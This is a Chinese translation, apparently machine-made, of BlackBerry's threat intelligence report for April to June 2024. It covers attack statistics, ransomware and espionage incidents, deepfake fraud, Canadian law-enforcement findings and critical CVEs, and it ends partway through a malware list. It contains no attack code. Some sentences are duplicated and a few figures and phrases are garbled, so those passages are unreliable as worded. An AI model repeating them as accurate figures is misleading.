全球威胁情报报告

2024 年 9 月版

报告期:2024 年 4 月 1 日至 6 月 30 日

重要的可操作情报

本报告全面回顾了全球威胁形势,重点是提供可操作的情报,客户可利用这些情报积极主动地保护其组织的安全。本报告涵盖的时间段为 2024 年 4 月至 6 月。报告亮点包括

独特的恶意软件和被阻止的攻击(被BlackBerry®网络安全解决方案阻止的未遂攻击)分别比上一报告期增长了53% 18% 。BlackBerry ,平均每天捕获超过 11,500 个独特的恶意软件哈希值

阅读《季度攻击》了解更多信息。

本季度,针对关键基础设施的攻击超过80 万次,其中50% 是针对金融部门的。

在 "关键基础设施"部分了解我们的网络威胁情报 (CTI) 团队的内部和外部调查结果。

在本轮攻击中,商业企业成为攻击的主要目标,在被阻止的攻击中,66%针对的是提供资本货物的公司。

有关这些威胁的更多信息,请参阅 "商业企业"部分。

新的 "Law Enforcement Limelight "部分为这些报告带来了新的内容,其中包括加拿大国家网络犯罪协调中心(NC3)的调查结果。

了解更多有关针对加拿大的勒索软件流行病的信息

 

在本报告所述期间,许多引人注目的犯罪集团(即勒索软件集团)非常活跃。这些团伙使用一系列复杂的工具来实现其目标。

在 "威胁行为者 "和 "工具"下阅读更多内容。

利用最新漏洞和新的或更新的恶意软件家族,网络威胁的漩涡不断涌现。

阅读我们的 "流行威胁 "部分,了解所有主要操作系统的趋势性威胁。

恶意信息窃取器(又称信息窃取器)是威胁行为者用来窃取有价值信息和凭证的重要武器。

请在CylanceMDR观察部分阅读我们对渗出工具的看法。

我们的地缘政治分析认为,复杂网络威胁的增加凸显了加强网络安全教育的必要性。

了解BlackBerry 如何在其位于马来西亚的首个网络安全卓越中心 (CCoE) 投资网络教育。

目录

BlackBerry®全球威胁情报报告》定期发布,旨在让首席信息安全官和其他关键决策者了解影响其所在行业和地理区域的最新网络安全威胁和挑战。2024 年,我们看到全球各地在各种两极分化问题上出现了地缘政治动荡。这激发了恶意行为者和机会主义网络威胁组织,他们利用人类动荡来牟利、造成伤害或只是为了添乱。为了应对这些威胁,BlackBerry 为全球各行各业的各种规模的组织提供必要的网络安全服务。

本期网络攻击总数

从 2024 年 4 月到 6 月,BlackBerry 网络安全解决方案阻止了 370 万次网络攻击。这意味着每天阻止的网络攻击超过4.35 万次,比 2024 年 1 月至 3 月的上一报告期增加了 18%

此外,我们平均每天 观察到11,500 个 针对我们客户群的 独特 恶意软件样本 ,比上次报告 增加了 53%。这是自我们发布《全球威胁情报》报告以来季度间百分比增幅最高的季度之一。虽然更改二进制哈希值或生成独特的有效载荷对经验丰富的威胁行为者来说并不复杂,但 "攻击停止 "和 "独特哈希值 "的异常高数量却意义重大。这表明恶意软件开发者正在快速更新和调整代码,以提高恢复能力。原始数据表明,新的恶意软件正在进行调整,现有恶意软件家族的能力正在增强,对手正在迅速采用更先进的战术。这导致恶意软件通过增强混淆性、复杂性和规避技术而变得更加强大。

BlackBerry 随着网络犯罪开发者努力绕过网络安全系统,我们正在积极监控和识别恶意软件家族的修改。在本报告中,您将看到我们的威胁研究和情报团队的最新发现,了解目前有哪些团体在使用每种类型的恶意软件,并查看我们针对这些类型的威胁提出的战略性网络防御建议。

您会发现,攻击总数独特 哈希值(新恶意软件)的数量并不一定相关。正如接下来几节中的图 2 至图 9 所示,并非每次网络攻击都使用独特的恶意软件。这取决于攻击者的动机、攻击的复杂性及其总体目标--如间谍活动、经济收益或对目标造成总体伤害。

图 1:2023 年 3 月至 2024 年 6 月每分钟遇到的唯一恶意软件哈希值。
(本报告涵盖 120 天的周期。其他报告的周期大致为 90 天)。

按国家分列的网络攻击总数

停止攻击

美国使用BlackBerry 解决方案的组织在本轮攻击中受到的攻击次数最多。在美国之外,韩国、日本、澳大利亚和新西兰也遭受了大量攻击,使它们跻身前五名,并使亚太地区(APAC)成为遭受攻击第二多的地区。

在亚太地区,BlackBerry 的参与正在增加,地缘政治紧张局势继续影响着网络趋势。针对关键基础设施、供应链和企业的国家支持和非国家支持的网络攻击呈上升趋势。组织越来越多地成为网络间谍、窃听、勒索软件和网络钓鱼攻击等大量威胁的目标。为了提高供应链和组织的应变能力,他们应谨慎行事,提高警惕,以保护其基础设施、数据、设备和通信。

图 2 显示了BlackBerry 网络安全解决方案阻止网络攻击最多的前五个国家,以及收到恶意二进制文件最多的前五个国家。

图 2:2024 年 4 月至 6 月按阻止攻击次数最多和唯一哈希值数量排名的国家。

独特的恶意软件

正如 "本期网络攻击总数 "部分所述,BlackBerry 平均每天观察到 11,500 次针对我们客户群的哈希 (独特恶意软件),比上一份报告增长了 53%。这是自我们开始定期发布报告以来观察到的季度间最高百分比增长之一。导致独特恶意软件数量上升的因素很多。其一是宏观层面的针对性攻击增加,例如针对整个员工电子邮件列表发送有针对性的钓鱼电子邮件和公司特定诱饵,希望多名员工上当受骗。

如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告一样,仍然位居榜首。如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告中一样,仍然位居榜首。此外,加拿大现在是第五大独特恶意软件接收国。

结果比较

从本期结果与上期报告的对比中我们可以看到,在阻止的攻击和遭遇的恶意软件独特哈希值方面,排名前四位的国家相对保持不变。不过,在我们的客户遭遇的恶意哈希值数量方面,日本超过了亚太地区的邻国。如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告中一样,仍然位居榜首。如图 2 所示,美国、日本、韩国和澳大利亚与上一期报告中一样,仍然位居榜首。此外,加拿大现在是第五大独特恶意软件接收国。
图 3:与上一份报告(2024 年 1 月至 3 月)相比,本报告(2024 年 4 月至 6 月)中被阻止的攻击总数和唯一哈希值的排名变化。

网络故事亮点:亚太地区的间谍活动

Transparent Tribe 利用跨平台编程语言瞄准印度政府、国防和航空航天部门

BlackBerry 研究人员在最新工作中发现了巴基斯坦高级持续威胁(APT)组织 "透明部落"(Transparent Tribe),该组织的目标是印度政府、国防和航空航天部门。该组织自 2013 年以来就以开展网络间谍活动而闻名,它使用 Python 和 Golang 等跨平台语言,并滥用 Telegram 和 Discord 等网络服务。最近的活动包括针对印度班加罗尔主要航空航天利益相关者的鱼叉式网络钓鱼电子邮件。尽管 Transparent Tribe 试图隐藏自己的来源,但其战术和工具都指向他们。 

按行业分列的网络攻击

BlackBerry 已将其行业部门整合为两大类:关键基础设施和商业企业。BlackBerry关键基础设施遥测和统计数据来自网络安全和基础设施安全局(CISA)定义为关键基础设施的 16 个行业的客户。这些行业包括医疗保健、政府、能源、农业、金融和国防。商业企业中的商业实体从事商品和服务的生产、分销或销售。这些企业在制造业、零售业和服务业等多个领域开展业务。

图 4:2024 年 4 月至 6 月阻止的特定行业攻击和独特哈希值。

关键基础设施

关键基础设施是网络犯罪分子有利可图的目标。这些数据通常价值很高,可以转卖给其他威胁组织,用于策划攻击,甚至用于间谍活动。针对关键基础设施的威胁分子可能会在攻击中使用勒索软件,因为组织可能宁愿支付赎金,也不愿花时间尝试从备份中恢复。对于提供医疗保健等关键服务的组织来说,时间是至关重要的,而威胁行为者也深知这一点。

今年,地缘政治动荡使关键基础设施成为反对其所在国或合作国政策的对手的目标。这经常促使威胁组织和国家支持者专门针对关键基础设施。

近年来,关键基础设施的数字化程度不断提高,使得该行业更容易受到网络犯罪分子的攻击。威胁者积极利用关键系统,攻击系统配置错误和未打补丁的遗留系统等漏洞,或试图通过针对员工的社会工程活动渗透系统。

在 2024 年 4 月至 6 月期间、 CylanceENDPOINT™和其他BlackBerry 网络安全解决方案阻止了超过80 万次针对关键基础设施行业组织的攻击。在这些攻击中,近一半是针对金融行业企业的,比上期增加了 10%,而政府和公共部门组织受到的攻击最为多样化,吸引了超过 45% 的独特哈希值。

此外,近一半(49%)的独特恶意软件哈希值以关键基础设施组织为目标,比上期增加了 17%,而BlackBerry 网络安全解决方案遇到的特定行业网络攻击中,41%是针对关键基础设施的。

图 5:2024 年 4 月至 6 月各部门阻止的关键基础设施攻击和独特恶意软件。
图 6:本季度关键基础设施中最受关注的内部威胁。

网络故事亮点:关键基础设施面临的威胁

SideWinder 利用新的配送基础设施瞄准地中海的港口和海事设施

2024 年 7 月,BlackBerry 威胁研究和情报小组发现了一个名为 SideWinder 的威胁组织的新活动。SideWinder 组织又称 "剃刀虎"、"响尾蛇 "和 T-APT-04,至少从 2012 年起就开始活跃。据观察,该组织曾以军事、政府和商业实体为目标,尤其关注巴基斯坦、阿富汗、中国和尼泊尔。SideWinder 通常使用电子邮件鱼叉式网络钓鱼、文档利用和 DLL 侧载技术来躲避检测并进行有针对性的植入。

在这次行动中,BlackBerry 观察到三个伪造的 "视觉诱饵 "文件与非常具体的端口基础设施有关。视觉诱饵本身通常没有恶意;其主要目的是分散受害者的注意力,使其意识不到自己已被入侵。受害者通常是目标公司的员工。以下是 SideWinder 最新活动中的一个示例:

图 7:SideWinder 在其最新活动中使用的视觉诱饵文件。
图 7:SideWinder 在其最新活动中使用的视觉诱饵文件。

威胁者使用各种伎俩诱使受害者打开并阅读视觉诱饵文件:

  • 攻击者复制合法组织的真实徽标,而接收者很可能因为工作或行业关系而熟悉该组织。在上文图 7 中,视觉诱饵文件滥用了埃及红海港务局(合法)的徽标。
  • 设计文件标题的目的是让收件人产生最大程度的焦虑。上面例子中的标题("雇员解雇和减薪通知")就是为了让雇员担心自己的工作和财务安全。
  • 在上面的示例中,请注意文件正文中 "耗尽了我们大部分的财务储备"、"严重关切"和 "终止雇佣关系"等充满感情色彩的短语。这些短语的格式为粗体,以便读者一眼就能看出来。

威胁行为者希望通过使用熟悉的公司徽标和激发强烈的情绪(如恐惧或对工作安全的担忧),让受害者相信文件是合法的,并在高度焦虑的状态下被迫阅读文件。这样,他们就会分心,以至于不会注意到设备上出现的奇怪事件,如系统弹出窗口或因 CPU 使用率高而导致风扇噪音增大,而这通常是恶意软件感染正在进行的早期预警信号。

通过分析研究过程中发现的数据,我们得出中等可信度的结论,即 SideWinder 的新活动以印度洋和地中海的港口和海事设施为目标。根据 SideWinder之前的活动,我们认为这次新活动的目标是间谍和情报收集。阅读BlackBerry 博客中的完整报道。

关键基础设施:外部威胁

BlackBerry 此外,BlackBerry,还密切跟踪外部威胁,或外部组织报告的、但不一定在 的租户中发现的威胁。在此期间,外部组织--政府机构、行业新闻组织和其他组织--报告了全球范围内针对关键基础设施的大量攻击。

3 月的最后几天,有消息称印度多个政府机构和能源部门实体感染了免费提供的信息窃取程序HackBrowserData 的定制变种。这个未知的威胁行为者利用钓鱼邮件作为感染载体,利用 Slack 频道作为外渗渠道,窃取了 8.8 GB 的敏感数据,包括员工详细信息和财务记录。

今年4 月,总部位于得克萨斯州的电信公司 Frontier Communications 向美国证券交易委员会(SEC)报告称,该公司于 4 月 14 日检测到一个漏洞,不得不关闭部分系统进行恢复。不明威胁行为者能够访问敏感数据,包括个人身份信息。

同样在4 月份,乌克兰计算机应急小组(CERT-UA)报告了据称由俄罗斯支持的 "沙虫"组织攻击这个饱受战争蹂躏的国家内各种关键基础设施实体的计划。该计划针对约 20 个实体,涉及包括水和能源在内的多个关键基础设施部门。由于俄罗斯和乌克兰之间的战争仍在继续,"沙虫 "长期以来对乌克兰关键基础设施的攻击很可能会持续下去。

五月的第一周,美国多个机构与英国国家网络安全中心和加拿大网络安全中心(CCCS)合作,就来自亲俄罗斯分子的持续黑客威胁发布了联合公告。黑客攻击的目标是与互联网连接的关键基础设施,包括水、能源、水坝和农业。他们的活动重点是欧洲和北美关键基础设施部门面向互联网的操作技术 (OT) 系统。

5 月初,BlackBasta勒索软件运营商将目标锁定在一家大型非营利天主教医疗服务提供商,该公司在美国 18 个州拥有约 140 家医院。随后,在6 月初BlackBasta 从马里兰州的生物技术公司 Elutia 窃取了 550 GB 的数据。这些数据包括员工和财务信息。

BlackBasta 并不是唯一一个以医疗保健为目标的勒索软件团伙。6 月底,BlackSuit 勒索软件团伙入侵了南非国家卫生实验室服务(NHLS)及其 265 个实验室。BlackSuit 被认为是具有侵略性和危险性的 Conti 勒索软件团伙的衍生产品。BlackSuit 入侵事件恰逢猴痘(mpox)爆发,对 NHLS 系统造成了严重影响。威胁方删除了 NHLS 系统的部分内容,包括备份,但没有报告丢失敏感的患者数据。

这些攻击以及上一季度的其他攻击表明,针对关键基础设施(尤其是医疗保健行业)的勒索软件运营商仍然是一个长期存在的问题。

商业企业

在本报告所述期间,针对商业企业的内部威胁也显著增加。BlackBerry 网络安全系统阻止的攻击次数(110 万次)比上一份报告增加了 60%。

在商业企业部门,我们注意到针对资本货物部门的攻击显著增加。与消费品不同,资本货物包括对整个商业企业和关键基础设施的各行各业至关重要的机械、工具和设备。针对这些资产的攻击会影响企业的数字和物理供应链。

图 8:2024 年 4 月至 6 月按行业分列的与商业企业有关的已阻止攻击和独特恶意软件。
图 9:2024 年 4 月至 6 月商业企业面临的最大内部威胁。

商业企业:外部威胁

4 月初IxMetro PowerHost 遭受了相对较新的 SEXi 勒索软件团伙的网络攻击,据称该团伙使用了泄露的 LockBit 3.0 源代码。该团伙以该组织的 VMware ESXi 服务器和备份为目标,严重破坏了 IxMetro PowerHost 在智利的服务。

同样在4 月份,中国购物平台Pandabuy 遭到入侵,130 多万客户的数据在网上泄露。Pandabuy 允许用户从其他中国电子商务平台购买产品。一个名为 "Sanggiero "的威胁行为者声称对此次攻击负责,称他们利用了该平台 API 中的关键服务器漏洞和其他漏洞,获取了该零售商内部服务的访问权限。该电商零售商最初被怀疑支付了一笔要求防止数据泄露的费用。然而,2024 年6 月,同一威胁行为者声称再次利用并勒索了该中国平台。

5 月初,一家大型跨国技术公司向客户发出警报,称发生了大规模数据泄露事件,近 5000 万人受到影响。虽然该技术公司证实没有财务信息被泄露,但其他个人身份信息(PII)却被曝光,包括客户姓名和实际地址。尽管如此,由于被盗数据的非财务性质,该技术公司还是公开淡化了此次外泄事件的潜在影响。

今年迄今为止最大的数据泄露事件之一发生在5 月份,当时威胁组织ShinyHunters 入侵了一家跨国娱乐票务销售和分销公司,窃取了超过 5.6 亿客户的数据。这些数据包括姓名、地址和电子邮件等 PII 以及散列的信用卡详细信息。受影响的用户已收到邮件通知。

今年6 月,一家美国跨国软件公司因遭受勒索软件攻击而发生大面积故障,数千家北美汽车经销商的业务受到影响。这次中断影响了 15,000 多家汽车经销商的所有活动,包括汽车销售和维修。勒索软件组织 BlackSuit 声称对此次攻击负责,并索要近 2500 万美元的加密货币作为赎金。据称,该组织支付赎金是为了恢复其系统。

6 月底,总部位于北美的软件服务公司 TeamViewer 证实,多产的 APT 组织 Cozy Bear(又名APT29)攻击了他们的企业 IT 系统。Cozy Bear 是一个总部设在俄罗斯的黑客组织,据称隶属于俄罗斯对外情报局。该组织多年来实施了多次攻击和漏洞利用,包括 2020 年的 SolarWinds 入侵事件。TeamViewer 发布声明称,只有员工账户数据被泄露,他们没有发现 Cozy Bear 访问生产环境或客户数据的证据。

网络故事亮点:针对商业企业的深度伪造

员工警惕:防范 Deepfake 骗局的第一道防线

深度伪造照片、视频和 "深度声音 "音频正在成为网络安全领域日益严重的问题。深度伪造是利用生成式人工智能(AI)创建的数字操纵媒体,最常见的使用案例是 "换脸"--将一个人的脸叠加到另一个人的脸上。深度伪造媒体通常高度逼真、令人信服,可被不良行为者用于各种攻击,包括网络钓鱼诈骗、虚假电话,甚至是虚假视频电话,目的是让接收者以为他们收到了其他员工(如老板)的合法请求。

自从 Reddit 用户在 2017 年底推出第一个用于创建深度伪造的应用程序以来,深度伪造以闪电般的速度发展,在诱骗员工向攻击者提供登录凭据、财务或客户记录,甚至将数百万美元的公司资金汇给骗子方面,已经变得非常有效。

在最近发生的一起事件中,汽车制造商法拉利躲过了一场代价高昂的深度伪造骗局。一位高管接到了冒充首席执行官 Benedetto Vigna 的可疑电话。骗子的口音和语气与真正的首席执行官几乎一模一样,但这位高管注意到了一些可疑之处,比如使用了一个陌生的电话号码,以及信息中声称的紧迫性。

为了核实来电者的身份,这位高管问了一个关于书籍推荐的具体问题--只有真正的首席执行官才知道这个细节。当骗子无法回答时,他们挂断了电话。这位高管的快速思维避免了一场潜在的灾难,并促使法拉利启动了内部调查,以确保通信安全。

这一事件凸显了员工在保护公司免受欺诈方面发挥的重要作用。几乎所有 deepfake 攻击的一个重要组成部分都是社交工程;威胁实施者假定员工是公司安全边界中最薄弱的环节,并使用心理操纵技术来获取目标的信任。对于那些对异常请求保持警惕和怀疑的员工,尤其是那些涉及转账或敏感信息的请求,我们要为他们点赞。他们的警觉和快速行动可以使公司避免重大经济损失和声誉损害。 

公司可以通过教育员工,让他们认识到在 "虚假 "电话/视频通话、电子邮件或短信背后可能隐藏着骗子的红旗,从而提高公司的安全性。您可以从赞美和支持这些无名英雄开始,他们每天都在保护您的组织免受复杂的威胁。与同事分享这则轶事。提醒他们,如果怀疑事情不对,要相信自己的直觉,并找到第二种方法来验证请求者的身份。

要了解有关深度伪造的更多信息,请阅读我们的白皮书、 揭开深度伪造的面纱:这一日益严重的威胁背后的技术和技巧.

地缘政治分析与评论

世界各国政府越来越清楚地认识到,技术是地缘政治竞争的驱动力。2024 年 5 月 6 日,美国国务卿安东尼-布林肯(Antony J. Blinken)在加利福尼亚州旧金山举行的 RSA 大会上发表讲话,描述了一个零和竞争的世界,各国将被迫采用西方或中国的技术堆栈。布林肯国务卿的网络空间和数字政策大使纳撒尼尔-C-菲克(Nathaniel C. Fick)更是一针见血地指出:"国际秩序将由谁的隐喻操作系统主导来定义

生成式人工智能等技术正以前所未有的速度向前发展,这引发了呼吁 "负责任地 "使用先进数字技术的大量活动。虽然人工智能等技术在推动经济增长、改变社会和解决世界上一些最棘手的问题(如气候变化、不平等和疾病)方面具有巨大的潜力,但它们也会带来影响巨大的风险,特别是当这些风险体现在人们日常依赖的关键基础设施或服务上时。

正如本报告所强调的,网络犯罪分子--包括国家支持的团体--越来越多地瞄准关键基础设施。在过去几年中,恶意或犯罪意图破坏服务或勒索关键基础设施运营商和所有者赎金的事件在全球范围内激增。在本报告所述期间,BlackBerry ,记录了超过 80 万次针对关键基础设施的攻击,其中 50%是针对金融部门的。犯罪者意识到这些服务的关键性,并试图通过最大限度地破坏或威胁破坏这些服务来最大限度地勒索赎金。

奥运会和国际足联世界杯等大型国际体育赛事也已成为网络威胁的焦点。由于预计恶意网络活动会急剧增加,加拿大网络安全中心于 2024 年 5 月发布了一份网络威胁公告,评估称 "网络犯罪分子很可能会通过商业电子邮件泄露和勒索软件攻击,将目标锁定在与大型国际体育赛事相关的大型组织以及大型体育赛事周边的本地企业"。"它还警告与会者和观众警惕利用这些赛事作为攻击诱饵的钓鱼电子邮件和恶意网站。

事实上,在奥运会结束后,法国当局报告了 140 多起与 2024 年奥运会有关的网络攻击,所有攻击都被定性为 "低影响"。然而,从往届奥运会的趋势来看,这个数字很可能被大大低估了。例如,在 2021 年东京奥运会期间,组织者报告了 4.5 亿次网络攻击。

世界经济论坛(WEF)在其《2024 年全球网络安全展望》中指出,政府和企业都在努力维持网络复原力,以应对迅速升级和日益复杂的网络威胁,这些威胁可能会造成大规模破坏。此外,各组织的自我保护能力也存在巨大差异。世界经济论坛指出,在拥有 10 万或以上员工的组织中,85% 的组织拥有网络保险,而在员工人数少于 250 人的组织中,只有不到 21% 的组织拥有网络保险。总而言之,规模最小的组织 "表示缺乏满足最低关键运营要求所需的网络复原力的可能性是规模最大的组织的两倍多"。大型组织和小型组织之间的这种不平衡需要得到解决。

执法风采

从这份《全球威胁情报报告》开始,BlackBerry 与加拿大皇家骑警国家网络犯罪协调中心 (NC3) 合作,重点介绍执法部门对网络犯罪趋势的重要见解。这只是BlackBerry 与世界各地执法机构合作,加强网络安全公私合作的一个例子。
执法风采
网络犯罪是全球公认的最大威胁,给执法工作带来了独特的挑战。与物理世界的犯罪不同,网络犯罪往往没有国界,犯罪者、受害者和基础设施通常属于不同的司法管辖区,包括国际管辖区。在没有全球警察部队的情况下,全球执法部门有必要制定协调应对网络犯罪的程序,并开展国际合作。

增强执法能力:NC3的专业支持

国家网络犯罪协调中心(NC3)成立于 2020 年,是对加拿大 2018 年国家网络安全战略的回应。在加拿大皇家骑警的管理下,这个国家警察部门的任务是帮助减少网络犯罪在加拿大造成的威胁、影响和伤害。它为加拿大所有警察部门提供专门支持,并同时雇用具有不同技能组合的警察和文职人员,以提供有效分析复杂犯罪所需的调查和技术专业知识。NC3 为支持执法合作伙伴提供专门服务,例如:

  • 网络犯罪情报
  • 技术咨询和指导
  • 工具开发
  • 行为分析
  • 加密货币追踪

NC3 与国内和国际执法部门、政府合作伙伴、私营企业和学术界密切合作,不断改进加拿大执法部门应对网络犯罪的措施。

勒索软件的流行

通过访问国家一级的网络犯罪数据,NC3 定期评估新出现的网络犯罪趋势,为调查重点提供信息,并更好地了解网络犯罪生态系统。国家网络犯罪中心利用公开来源的报告来加强对情况的了解。勒索软件被评估为加拿大最大的网络犯罪威胁,因为向 NC3 报告的事件中近 60% 是勒索软件攻击。由于勒索软件运营商以所有行业和组织为目标,因此没有任何组织可以幸免,不过在加拿大,中小型企业(SMB)是一个特别有吸引力的目标。

加拿大的顶级勒索软件威胁

NC3 定期进行评估,以确定加拿大最主要的勒索软件威胁。最近一次评估涵盖了 2024 年 1 月 1 日至 2024 年 4 月 30 日期间发生的事件。下图列出了这一时期的十大勒索软件威胁。

尽管勒索软件猖獗,但大多数网络犯罪都没有报案。据估计,只有约 10% 的网络犯罪向加拿大执法部门报告。这种报告不足的情况使得全面了解网络犯罪在加拿大的流行程度和影响变得十分困难。

图 10:2024 年 1 月至 4 月 NC3 发现的影响加拿大的顶级勒索软件。

报告不足的犯罪

要全面了解网络犯罪的真实范围和影响,解决普遍存在的网络犯罪报告不足问题至关重要。准确的报告不仅能提高 NC3 等执法机构有效应对的能力,还能加强战略对策的基础。通过加强公共和私营部门之间的合作,我们可以弥合报告方面的差距,并针对不断演变的网络犯罪威胁建立更具弹性的防御体系。
图 3:与上一份报告(2024 年 1 月至 3 月)相比,本报告(2024 年 4 月至 6 月)中被阻止的攻击总数和唯一哈希值的排名变化。

网络故事集锦:勒索软件上天

Akira 勒索软件的目标是拉美航空业

2024 年 6 月,BlackBerry 研究人员调查了 Storm-1567 使用 Akira 勒索软件对一家拉美航空公司发动的攻击。这个以双重勒索策略著称的金融犯罪团伙最初通过 SSH 访问网络,并在部署 Akira 之前窃取了重要数据。Storm-1567 以利用过时系统和滥用合法软件而著称,它以全球中小企业为目标,截至 2024 年 1 月,共攻击了 250 多家组织,勒索了超过 4200 万美元的赎金

事件响应分析和评论

BlackBerry 事件响应 (IR) 小组定期监控以连接互联网的设备为初始感染媒介的事件。针对易受攻击设备的网络攻击很常见,例如配置错误的设备或出厂时设置了密码的设备。工作过度的企业安全团队往往无法充分保护所有互联网设备(如网络打印机和笔记本电脑网络摄像头)的安全。此外,越来越多的关键功能被嵌入到设备中,如网络和防火墙设备。

本季度,投资者关系团队在过时版本的思科自适应安全设备(ASA)和装有 Palo Alto Networks PAN-OS 软件的设备中发现了漏洞。未受保护或配置不佳的互联网设备可让网络窃贼在公司环境中部署勒索软件,并外泄数据。这凸显了公司对所有暴露在互联网上的系统进行安全更新并及时更新的必要性。(MITRE - 外部远程服务)

该小组观察到几起未经授权的行为者能够访问公司云资源的事件。下文详述的最近两起事件突出说明了定期系统更新和强大网络安全措施的重要性。

  • 事件 1:在一次网络安全漏洞事件中,威胁分子利用过时的 Cisco ASA 上的一系列漏洞,在未经授权的情况下访问了公司的虚拟专用网络 (VPN)。进入网络后,他们利用 Microsoft 远程桌面协议 (RDP) 潜入域控制器,从而获取了域内用户和组的完整列表。利用 netscan 和高级 IP 扫描仪软件等工具,威胁者进行了彻底的网络扫描,以绘制基础设施地图。随后,攻击者渗出了包含关键用户数据的整个 "C:\Users "文件夹,然后部署了 Akira 勒索软件,造成了严重的破坏和数据丢失。
  • 事件 2:某客户收到来自其域控制器的令人震惊的安全警报,表明存在未经授权的访问。调查显示,威胁行为者利用了过时、报废的 Cisco ASA 设备中的漏洞来渗透网络。进入网络后,攻击者部署了 BlackSuit 勒索软件,严重破坏了客户的运营。

这些事件凸显了公司在所有系统上实施强大身份验证安全控制的必要性。(MITRE--有效账户:云账户)

图 11:2024 年 4 月至 6 月最主要的事件响应情景。

网络故事精选:大规模数据泄露暴露 29 亿条记录

美国、英国和加拿大公民的四兆兆字节个人数据被盗。

今年 4 月,臭名昭著的地下网络犯罪网站 BreachForums 上发布了一条销售帖子,内容涉及 "美国、加利福尼亚州和英国全部人口 "的个人记录疑似泄露。该帖子声称有4 TB 的数据被盗,其中包括高度敏感的 PII,如美国公民以及英国和加拿大人的全名、邮寄地址、电话号码甚至社会安全号(SSN)。

名为 USDoD 的威胁行为者声称窃取了超过 29 亿行记录,并要求为这一大型数据集中的泄漏信息支付 350 万美元的巨额费用。

这一赎金要求最终被证明是不成功的,7 月份,4 TB 的数据通过 BreachForums 免费发布。其中包括超过 1.37 亿个电子邮件地址、2.72 亿个 SSN 等。据信,泄露的原因与 RecordsCheck.net 有关,该网站是数据经纪商和背景调查服务公司 National Public Data (NPD) 的一个附属网站,无意中将其后端数据库的密码发布在一个明文文件中,该文件可从其主页上免费获取--这一关键的安全疏忽最终被威胁行为者发现并利用

在一份正式声明中,NPD 承认有人在 2023 年底试图访问他们的记录;但他们没有提及可能受到影响的记录范围。

虽然这些数据最近才被泄露,但其本身却跨越了数十年,这意味着受此次泄露影响的一部分受害者可能已经去世,而且泄露的一些数据很可能已经过时。还需要注意的是,一个人可能有许多不同的记录,每条记录都与该人以前的地址和姓名有关。这意味着受此次泄密事件影响的人数可能远低于之前媒体错误宣称的 30 亿人。

然而,鉴于 PII 数据量之大,它已成为美国有史以来最大的数据泄露记录之一,应引起所有美国受害者的关注。在接下来的几个月里,随着这次灾难的余波逐渐平息,这些被盗数据极有可能被许多其他威胁行为者利用并作为武器。因此,所有公民都应积极监控自己的信用报告,防止欺诈活动,并在发现欺诈活动时向征信机构报告。

网络故事亮点:新兴勒索软件集团 - 太空熊

在勒索软件团伙充斥的网络威胁环境中,针对合法组织的勒索软件仍然是网络犯罪分子的有利可图之举。新团伙经常出现或从旧团伙中分化出来,通常以新的或改进的勒索软件菌株和作案手法开始行动,而这些手法通常沿用过去威胁行为者久经考验的方法。

本报告所述期间出现的 Space Bears 就是这样一个团体,他们以其华而不实的泄密网站而闻名。一些研究人员认为,他们可能与 Phobos RaaS 运营商有联系

图 12:太空熊泄漏现场。
图 12:太空熊泄漏现场。(资料来源:https://socradar.io/dark-web-profile-spacebears/)

谁是太空熊?

与当今大多数勒索软件团伙一样,Space Bears 采用了双重勒索方法。在进入受害者的网络后,它们首先会流出敏感数据,然后对其进行加密,向受害者施压,迫使其支付赎金。太空熊可能会威胁说,如果不支付赎金,他们就会在互联网上公开发布数据。

被盗数据的参考资料发布在他们的泄密网站上,该网站位于深网上的一个".onion "地址。Tor 项目通常被称为 "洋葱路由器",是一种开源隐私保护工具,可确保用户的在线活动匿名且安全。如果受害者不在规定时间内支付赎金,就会在这个泄密网站上被点名羞辱,并显示一个倒计时器,直到数据被释放。自 4 月中旬开始活跃以来,该组织已针对全球各行业的 20 多名受害者实施了攻击。

图 13:太空熊泄漏网站受害者页面。
图 13:太空熊泄漏网站受害者页面。

太空熊的目标行业和地理位置

太空熊的受害者遍布全球各行各业。目标行业和全球地点的广泛性可能是有意为之。例如,该组织可能试图避开执法部门的视线,使保卫者更难找到他们。因此,通常需要开展国际合作来调查这些犯罪并取缔威胁组织。由于威胁分子的活动遍布全球各地,各国政府和执法机构需要时间做出反应并共享信息。不幸的是,这为勒索软件团伙提供了更多策划、逃避和重组的机会。
图 14:太空熊威胁组织的目标行业。
图 15:迄今为止太空熊受害者的位置。

常见漏洞和风险

著名的常见漏洞和暴露(CVE)为识别、规范和公布已知的安全漏洞和暴露提供了一个框架。从 2024 年 4 月到 6 月,美国国家标准与技术研究院(NIST)报告了近 12011 个新的 CVE。与 2024 年 1 月至 3 月的类似时间段相比,披露的漏洞增加了近 35%。

五月份是今年迄今为止新发现 CVE 最多的月份,新发现的 CVE 接近 5103 个,打破了今年第一季度的所有记录。其中包括
 

Palo Alto PAN-OS RCE

CVE-2024-3400(10.0 临界) 任意代码执行
据 Palo Alto 称,此问题适用于配置有 GlobalProtect 网关或 GlobalProtect 门户的 PAN-OS 10.2、PAN-OS 11.0 和 PAN-OS 11.1 防火墙。该 CVE 与 Palo Alto Networks PAN-OS 软件的 GlobalProtect 功能中的任意文件创建漏洞导致的命令注入有关。该漏洞有可能使未经认证的攻击者以根权限在防火墙上执行任意代码。鉴于这种可能性,CVE 被评为最高危急等级。
 

PyTorch 框架存在 RCE 漏洞

CVE-2024-5480(10.0 严重) 任意代码执行
PyTorch 的 "torch.distributed.rpc "框架(特别是 2.2.2 之前的版本)中存在漏洞,允许远程代码执行 (RCE)。该漏洞允许攻击者利用内置 Python 函数执行任意命令。

 

量子网关信息披露

CVE-2024-24919(8.6 高) 身份验证绕过
VPN 等外围网络设备是黑客和高级国家赞助者的主要攻击目标。Check Point™ 于 2024 年 5 月 28 日发布了一条零日公告,警告客户其安全网关中的一个漏洞可允许攻击者访问敏感信息并获得域权限。该漏洞可使黑客横向移动并获得更多网络权限。Check Point在一份声明中指出,出现了一些未经授权的访问尝试,有数千台潜在设备受到该漏洞的影响。

图 16:CVE 评分,2024 年 4 月至 6 月。

按平台划分的普遍威胁:视窗

信息窃取者

Lumma Stealer 是一款基于 C 语言的信息窃取程序,主要从受害者的设备中窃取私人和敏感数据,包括加密货币钱包数据和双因素身份验证(2FA)浏览器扩展数据。

下载器

GuLoader(又名 CloudEyE)是用 Visual Basic 5 或 6 封装的加密 shellcode,用于下载各种类型的附加有效载荷。

信息窃取者

Agent Tesla 是一种基于 .NET 的木马,经常被当作 MaaS 出售,主要用于收集凭证。

信息窃取者

